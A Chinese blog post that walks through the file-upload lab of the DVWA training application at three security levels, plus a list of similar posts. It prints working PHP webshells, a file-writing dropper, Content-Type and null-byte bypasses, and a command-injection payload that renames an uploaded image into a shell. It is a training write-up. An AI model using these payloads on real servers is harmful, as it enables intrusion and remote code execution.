DVWA篇_文件上传

原创 已于 2023-05-31 18:37:28 修改 · 2.3k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

于 2023-05-25 23:10:27 首次发布
文章详细介绍了如何利用不同级别的文件上传过滤漏洞,包括更改Content-Type、使用%00截断、命令执行和文件包含漏洞来获取服务器权限。在低级别中,可以直接上传.php文件;中级别可通过修改Content-Type或使用%00截断;高级别则需利用命令执行或文件包含漏洞将图片文件转为PHP文件以执行代码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

准备工作:

Low

Medium 

方法一:更改Content-Type类型

方法二:针对文件后缀过滤可以使用%00截断(适用于5.3.4以下的php版本) 

High

方法一:使用命令执行漏洞将文件类型改为php

方法二: 使用文件包含漏洞

 总结:

准备工作:

1.一句话木马:

<?php @eval($_POST['pass']);?>

2.蚁剑

3.Burp Suite

Low

分析代码可知low级别没有进行任何过滤,我们可以直接上传.php文件

使用蚁剑连接 

Medium 

分析代码可知medium级别对content-type以及文件大小进行了过滤,要求为image/jpeg或image/png,我们可以使用Burp Suite抓包改content-type或使用%00进行文件截断(适用于5.3.4以下的php版本)

方法一:更改Content-Type类型

原类型为application/octet-stream,这里我们改为image/jpeg

成功上传后使用蚁剑连接 

方法二:针对文件后缀过滤可以使用%00截断(适用于5.3.4以下的php版本) 

将filename改为test.php.jpeg,再使用%00截断,并进行URL编码

 

这里的content-type因为是.jpeg文件,所以自动修改为image/jpeg了

 再使用蚁剑连接

High

分析代码可知high级别使用白名单的方式进行文件类型过滤,只能是jpg、jpeg、png类型,我们可以使用windows的copy命令来制作图片木马

上传成功

因为上传的是静态文件, 这个时候我们使用蚁剑是连接不了的。有两种方法,第一种是使用命令执行漏洞将文件类型改为php,第二种是使用文件包含漏洞去执行我们上传的文件,执行后会自动生成一个php文件。

方法一:使用命令执行漏洞将文件类型改为php

输入以下代码

127.0.0.1|move ../../hackable/uploads/shell.png ../../hackable/uploads/shell.php

将图片木马文件类型改为php文件类型,成功后会显示以下结果

这时候我们使用蚁剑进行连接

方法二: 使用文件包含漏洞

此方法需要将一句话改为

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[pass])?>');?>

使木马有写功能 

先把security等级跳到low,然后复制刚刚上传的路径,之后利用文件执行漏洞去执行我们的图片木马文件。

可以看到文件执行成功

来到文件包含文件夹下,生成了shell.php文件

 

 使用蚁剑连接

 总结:

DVWA里的文件上传过滤可以抓包修改content-type,也可以使用%00截断,还使用copy命令制作图片木马,然后使用命令执行或者文件包含漏洞getshell

还可以使用前端JS绕过,.htaccess文件上传,竞争条件文件上传等方法

Catherines7
关注
DVWA文件上传
qq_62078839的博客
04-03 3815
LOW 直接上传小马,上传成功 使用phpinfo();验证小马的可用性 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'na..
DVWA文件上传(File Upload)
qq_39682037的博客
03-21 2726
文件上传(File Upload) Security Level: low 源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; ...
DVWA-File Upload(文件上传)
简简的博客
02-02 577
本系列文集:DVWA学习笔记 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 ###Low: 函数介绍: basename()函数返回路径中的文件名部分。 string basename ( string $path [, string $suffix ] ) 参数介...
DVWA文件上传笔记
最新发布
qq_45562910的博客
05-24 463
本文记录了DVWA文件上传漏洞的四关实验过程。第一关无任何过滤,直接上传一句话木马成功;第二关仅过滤文件后缀,通过修改后缀名绕过;第三关检测文件真实类型,采用文件包含漏洞将木马嵌入图片实现上传;第四关采用多重防护措施(生成唯一ID、过滤真实类型、删除注释、删除原始图片),彻底阻断攻击可能。实验展示了不同安全防护级别下文件上传漏洞的利用与防御方法。
DVWA 文件上传
m0_56107268的博客
04-30 2163
Low File Upload Source vulnerabilities/upload/source/low.php <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILE..
DVWA靶场-----FIle Upload(文件上传
m0_65712192的博客
11-14 5661
DVWA靶场-----FIle Upload(文件上传
dvwa文件上传漏洞低级,中级,以及高级的难度测试(手把手教会你文件上传
qq_61426144的博客
07-18 2057
审计代码得知这里使用了白名单模式,除了jpg,JPG,jpeg,JPEG这几种类型除外,其它的一律不准上传,那我们直接配合文件包含漏洞包含我们的图片马直接getshell,制作图片马的过程小编这里就不展示了,各位小伙伴可以网上搜索图片马制作过程,这里高级难度我是用的是fofa上面搜索的DVWA的高级难度,因为我的靶机高级难度是写死了,在这里我们上传的图片马为1.jpg。最后利用菜刀工具直接链接该地址就行,后续小编也会更新文件包含的漏洞,文件上传漏洞可能有些地方讲的不是很好,还请大家多多指教。
DVWA-File Upload文件上传
mlws1900的博客
03-16 1133
黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA文件上传漏洞
m0_59448417的博客
10-10 572
通常在一些网站中都有文件上传的一个功能,比如上传头像或者背景之类的,这就是一个注入点。在这里我们可以上传webshell来达成一些目的。这里以DVWA里的靶场给大家做个解析。提示:以下是本文章正文内容,下面案例可供参考。
文件上传漏洞——DVWA练习
Lemon's blog
08-03 1603
前言:文件上传漏洞是很常见的漏洞,也非常有趣,接下来就在DVWA靶场中边学边练。 low级别 观察源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/upl...
Apache服务以及DVWA靶场搭建
2302_76344470的博客
07-29 1228
CentOS服务器安装Apache服务以及DVWA靶场搭建
DVWA-文件上传(File Upload)
weixin_58954236的博客
08-20 1700
指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
DVWA】——File Upload(文件上传
HinsCoder的博客
09-15 1441
文件上传漏洞是由于对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。
DVWA-文件上传upload
Cwillchris的博客
10-28 2271
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: 一、Low级 1、查看源码及分析 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? //文件的目标路径hackable/uploads/,也就是文件上传的位置 $target_path = DVWA_WEB
DVWA靶场系列(四)—— File Upload(文件上传
qq_45612828的博客
07-12 6284
DVWA靶场系列(四)—— File Upload(文件上传
5、DVWA——文件上传
qq_55202378的博客
09-11 1469
DVWA 文件上传
DVWA 之 File Upload(文件上传
RexHa的博客
10-02 2946
文件上传原理: 黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA---文件上传
孤的博客
11-20 1012
File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 网页能够上传文件的条件 表单提交方式:post (get方式提交有大小限制,post没有) 表单的enctype属性:必须设置为multipart/form-data 表单必须有文件上传项:fi...
dvwa靶场通关文件上传漏洞
03-28
### DVWA 文件上传漏洞 攻防 实验通关 方法 技巧 #### 背景介绍 DVWA(Damn Vulnerable Web Application)是一款用于学习Web安全漏洞的开源应用程序。其中,“File Upload”模块旨在模拟文件上传过程中的常见漏洞及其利用方法。 在低安全性设置下,该功能允许用户上传任意类型的文件到服务器上,而无需严格的验证机制[^1]。这可能导致攻击者通过上传恶意脚本文件来执行远程代码或其他危险操作。 #### 利用技巧与步骤说明 ##### 1. 测试基本文件类型限制 尝试上传不同扩展名的文件,观察哪些被接受或拒绝。通常情况下,在较低难度级别中,仅会简单检查文件后缀是否属于白名单内的图片格式如 `.jpg`, `.png` 等[^2]。 ##### 2. 绕过简单的MIME检测 即使系统可能基于HTTP头字段Content-Type来进行初步过滤,但这很容易伪造。可以修改客户端发送的数据包,将非图像文件伪装成合法形式提交给服务端处理程序解析错误从而成功加载shell php代码片段作为测试样例展示如下: ```php <?php echo shell_exec($_GET['cmd']); ?> ``` 此段PHP语句能够接收来自URL参数 `cmd` 的命令并回显其执行结果[^3]。 ##### 3. 使用零宽度字符或者双扩展名技术规避扫描器识别 某些实现不够完善的防御措施可能会忽略掉隐藏于正常外观之后的实际威胁载体;例如命名为类似这样的文件:“ harmless.jpg.php ” 或 “ innocent.png%00evil_script.txt”,它们看起来像是常规图形资源但实际上包含了可被执行逻辑部分[^4]。 ##### 4. 验证存储位置及权限配置情况 如果前面几步都顺利完成,则最后一步就是确认所放置的位置是否有足够的访问控制以及能否触发相应动作。一般而言,默认安装路径下的临时目录可能是开放读写的,因此只要能正确调用刚才植入的功能入口就完成了整个流程演示[^5]。 以上便是针对DVWA平台里关于“文件上传漏洞”的一些基础探索方向及相关注意事项概述。 ```bash curl -F "uploaded=<your_payload>" http://localhost/DVWA/vulnerabilities/upload/ ``` 上述命令展示了如何借助cURL工具自动化完成一次表单递交的过程实例[^6]。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值